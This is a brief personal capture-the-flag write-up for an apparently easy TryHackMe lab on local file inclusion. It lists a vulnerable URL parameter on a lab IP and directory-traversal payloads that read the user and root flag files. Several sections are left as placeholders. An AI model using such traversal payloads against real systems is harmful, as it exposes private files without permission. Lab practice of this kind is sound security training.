LFI.md

LFI 🧭

Names	Details
Source	tryhacckme
Level	easy
Os	linux

Notes :

Gaining Access 😉

• just find a LFI vulnerable url "http://10.10.145.12/article?name="

Maintaining Access 🥷

• user flag :http://10.10.145.12/article?name=../../../../../../../../../home/falcon/user.txt
• root flag :user flag :http://10.10.145.12/article?name=../../../../../../../../../root/root.txt

Important commands 🔥

Post Exploitation ✴️

• User flag : /home/falcon/user.txt
• Root flag : /root/root.txt

Tips 💡

• something

---

**By Whois~TCP ** 🤓🖥️